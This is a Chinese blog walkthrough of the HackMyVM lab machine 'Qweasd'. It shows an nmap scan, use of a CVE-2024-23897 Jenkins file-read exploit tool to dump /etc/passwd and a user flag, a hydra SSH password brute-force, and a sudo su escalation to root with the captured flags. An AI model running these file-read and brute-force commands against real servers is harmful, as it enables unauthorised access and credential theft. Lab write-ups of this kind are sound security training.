Qweasd - hackmyvm

古明地核

已于 2024-05-16 15:13:49 修改

阅读量270

点赞数 2

分类专栏： hackmyvm靶场合集文章标签： linux 安全服务器网络网络安全

于 2024-05-16 15:13:01 首次发布

本文链接：https://blog.csdn.net/tanbinn/article/details/138962446

版权

hackmyvm靶场合集专栏收录该内容

36 篇文章 1 订阅

订阅专栏

简介

靶机名称：Qweasd

难度：中等

靶场地址：https://hackmyvm.eu/machines/machine.php?vm=Qweasd

本地环境

虚拟机：vitual box

靶场IP（Qweasd）：192.168.56.116

跳板机IP(windows 11)：192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04)：192.168.190.30

扫描

nmap起手

nmap -p 1-65535 -T4 -A -v 192.168.56.116/32

http

CVE利用

发现是jenkins，网上搜了一下，发现很新的CVE

检测一下，可以直接执行

先读取一下passwd文件获取用户列表

./CVE-2024-23897 -url http://192.168.56.116:8080/ -c reload-job -a /etc/passwd

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin: No such item ‘messagebus:x:103:104::/nonexistent:/usr/sbin/nologin’ exists.
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin: No such item ‘dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin’ exists.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: No such item ‘mail:x:8:8:mail:/var/mail:/usr/sbin/nologin’ exists.
pollinate:x:105:1::/var/cache/pollinate:/bin/false: No such item ‘pollinate:x:105:1::/var/cache/pollinate:/bin/false’ exists.
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin: No such item ‘_apt:x:100:65534::/nonexistent:/usr/sbin/nologin’ exists.
penetration:x:1001:1001::/home/penetration:/bin/bash: No such item ‘penetration:x:1001:1001::/home/penetration:/bin/bash’ exists.
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin: No such item ‘gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin’ exists.
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false: No such item ‘lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false’ exists.
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin: No such item ‘usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin’ exists.
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: No such item ‘irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin’ exists.
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false: No such item ‘tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false’ exists.
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin: No such item ‘tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin’ exists.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such item ‘list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin’ exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such item ‘man:x:6:12:man:/var/cache/man:/usr/sbin/nologin’ exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such item ‘daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin’ exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin: No such item ‘sys:x:3:3:sys:/dev:/usr/sbin/nologin’ exists.
sync:x:4:65534:sync:/bin:/bin/sync: No such item ‘sync:x:4:65534:sync:/bin:/bin/sync’ exists.
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin: No such item ‘sshd:x:106:65534::/run/sshd:/usr/sbin/nologin’ exists.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such item ‘www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin’ exists.
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin: No such item ‘landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin’ exists.
kali:x:1000:1000:asd:/home/kali:/bin/bash: No such item ‘kali:x:1000:1000:asd:/home/kali:/bin/bash’ exists.
root:x:0:0:root:/root:/bin/bash: No such item ‘root:x:0:0:root:/root:/bin/bash’ exists.
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such item ‘backup:x:34:34:backup:/var/backups:/usr/sbin/nologin’ exists.
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin: No such item ‘systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin’ exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such item ‘nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin’ exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: No such item ‘lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin’ exists.
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such item ‘uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin’ exists.
syslog:x:107:113::/home/syslog:/usr/sbin/nologin: No such item ‘syslog:x:107:113::/home/syslog:/usr/sbin/nologin’ exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin: No such item ‘bin:x:2:2:bin:/bin:/usr/sbin/nologin’ exists.
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such item ‘news:x:9:9:news:/var/spool/news:/usr/sbin/nologin’ exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: No such item ‘proxy:x:13:13:proxy:/bin:/usr/sbin/nologin’ exists.
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin: No such item ‘systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin’ exists.
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin: No such item ‘systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin’ exists.
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin: No such item ‘uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin’ exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such item ‘games:x:5:60:games:/usr/games:/usr/sbin/nologin’ exists.

目前看来关键用户是kali,root,penetration

先读取用户的一个flag，闯过一关

./CVE-2024-23897 -url http://192.168.56.116:8080/ -c reload-job -a /home/penetration/user.txt

flag{Whynotjoinsomehackercommunicationgroups_}

爆破

得到用户列表之后就直接进行爆破，成功得到kali的密码

hydra -l kali -P $HVV_PATH/8_dict/kali.txt 192.168.56.116 ssh

提权

sudo su，然后就成为root用户了……

kali@asd:~$ sudo su
[sudo] password for kali:
root@asd:/home/kali# cd ~/root.txt
bash: cd: /root/root.txt: Not a directory
root@asd:/home/kali# cd ~
root@asd:~# ls
root.txt  snap
root@asd:~# cat root.txt
flag{Hackercommunicationgroup660930334iswaitingforyoutojoin_}
root@asd:~#

flag{Hackercommunicationgroup660930334iswaitingforyoutojoin_}